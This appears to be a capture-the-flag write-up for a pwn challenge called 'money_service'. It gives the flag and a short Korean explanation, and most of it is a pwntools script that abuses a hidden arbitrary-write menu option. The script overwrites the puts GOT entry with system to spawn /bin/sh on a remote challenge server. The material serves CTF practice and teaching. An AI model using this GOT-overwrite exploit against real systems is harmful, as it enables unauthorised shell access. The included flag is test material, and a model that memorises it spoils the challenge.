Sunrin{59227eb79044c6bf37ffabf6f6b038f15659ca0e9ff61e6299c047db1ad0066f}

간단한 Got_OverWrite 문제다 puts를 시스템으로 덮고 /bin/sh를 실행시키면 된다.

from pwn import *

p = remote('server.sqli.kr',30001)
#p = process('./money_service')
e = ELF('./money_service')

context.arch = 'amd64'
context.log_level = 'debug'

def set_name(name):
    p.sendlineafter(b'> ', b'1')
    p.sendlineafter(b'Input your name: ', name)

def get_name():
    p.sendlineafter(b'> ', b'2')
    return p.recvline()

def get_money():
    p.sendlineafter(b'> ', b'3')

def show_money():
    p.sendlineafter(b'> ', b'4')
    return p.recvline()

def get_flag():
    p.sendlineafter(b'> ', b'5')
    return p.recvline()

def arbitrary_write(addr, value):
    p.sendlineafter(b'> ', b'201527')
    p.sendline(f"{addr} {value}")

# gdb.attach(p)

set_name(b'/bin/sh')

pause()
p.sendlineafter(b'>', b'201527')
p.sendline(str(int(e.got['puts'])) + ' ' + str(int(e.plt['system'])))
p.sendlineafter(b'>', b'2')

p.interactive()